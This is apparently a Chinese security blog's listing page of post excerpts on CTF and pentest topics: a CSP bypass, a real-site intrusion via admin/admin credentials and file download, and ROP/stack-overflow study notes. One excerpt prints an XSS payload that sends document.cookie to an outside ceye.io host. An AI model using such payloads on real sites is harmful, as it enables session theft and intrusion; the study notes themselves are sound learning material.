Fork me on GitHub
摘要:看csp规则,默认是在当前域内,允许执行内联js。如果这是一道ctf的话,就很简单了, window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe 阅读全文
posted @ 2020-05-03 14:08 afanti~ 阅读(31) 评论(0) 推荐(0) 编辑
摘要:案例是在最近项目中遇到的俩个站,挺有意思的,所以分享出来。第一个站getshell后,内网简单的看了下,发现不是目标就没深入。 第一个站 1、弱口令 弱口令:admin admin进入网站后台 2、任意文件下载 在系统配置备份模块发现http://xxx.xxx.xxx.xxx/DownloadSe 阅读全文
posted @ 2020-05-03 14:07 afanti~ 阅读(85) 评论(0) 推荐(0) 编辑
摘要:当时不明白为什么要padding 8个a 原因: IDA查看当前的rsp是0x38 0x30=0x8,原因看上面 在vul函数ret地方下断点,rbp=0x1,r12=write_got地址,r13=0x1,r14=write_got地址,r15=0x8,执行add rsp,0x38= rsp就是0 阅读全文
posted @ 2020-04-17 18:14 afanti~ 阅读(48) 评论(2) 推荐(0) 编辑
摘要:今天并没有刷题,看到ctf wiki高级ROP,发现ret2_dl_runtime_resolve,涉及到PLT&GOT 表以及延迟绑定机制,还是把基础打好。 今天笔记不多,主要是理解。推荐一下看的资料 "PLT&GOT 表以及延迟绑定机制" "ELF 文件结构解析" "ELF文件结构解析的工具" 阅读全文
posted @ 2020-04-13 17:36 afanti~ 阅读(90) 评论(0) 推荐(0) 编辑
摘要:ROP x64位的,ret2csu: "http://www.vuln.cn/6644" "https://ctf wiki.github.io/ctf wiki/pwn/linux/stackoverflow/medium rop zh/ ret2reg" plt和got看这俩篇文章: "http 阅读全文
posted @ 2020-04-12 17:23 afanti~ 阅读(24) 评论(0) 推荐(0) 编辑
摘要:一、事件起因 一次师兄让我检测一下他们开发的网站是否有漏洞,网站是php开发的,最近一直搞java,正好最近有场CTF要打,就顺便看看php. 二、获取源码 仔细看他给我发的那张图片,360给这个网站53的评分,仔细看网站存在.git文件泄露,直接用Githack拿到源码。 三、确定后台框架 拿到源 阅读全文
posted @ 2020-04-08 23:14 afanti~ 阅读(35) 评论(0) 推荐(0) 编辑
摘要:https://bbs.pediy.com/thread 248681.htm pwn4 这道题,查看是否有sytem系统函数,IDA中Alt+t 看system在plt表中的位置 查找一个pop xxx;ret为了堆栈平衡 也就是这个图的原理 在IDA中,plt表在的往下看找到.bss段发现buf 阅读全文
posted @ 2020-04-08 18:00 afanti~ 阅读(31) 评论(0) 推荐(0) 编辑
摘要:在看蒸米文章时候,http://www.vuln.cn/6645,这个例子是向buff写入shellcode,最后ret到shellcode地址执行。 堆栈示意图就是这样: 注意的点,算shellcode地址,去调试core文件,x/10s $esp 144,实际就是buf起始地址。 通过ROP绕过 阅读全文
posted @ 2020-04-07 18:08 afanti~ 阅读(32) 评论(0) 推荐(0) 编辑
摘要:上一篇,计算缓冲区大小是通过IDA和gdb调试计算出来的,这次有个小trick. 我们可以用调试工具(例如 gdb)查看汇编代码来确定这个距离,也可以在运行程序时用不断增加输入长度的方法来试探(如果返回地址被无效地址例如“AAAA”覆盖,程序会终止并报错)。 来到vulnerable函数调用。cyc 阅读全文
posted @ 2020-04-05 17:03 afanti~ 阅读(28) 评论(0) 推荐(0) 编辑
摘要:1、 最简单函数调用栈图如下 (vc++6.0编译出的汇编代码): push 2,push 1将俩个参数压栈, call 0040100A :将eip要执行的下一条指令入栈,在执行jmp 0040100A push ebp :ebp入栈,保留调用前的栈底 mov ebp,esp 提升堆栈 sub E 阅读全文
posted @ 2020-04-04 17:39 afanti~ 阅读(70) 评论(0) 推荐(0) 编辑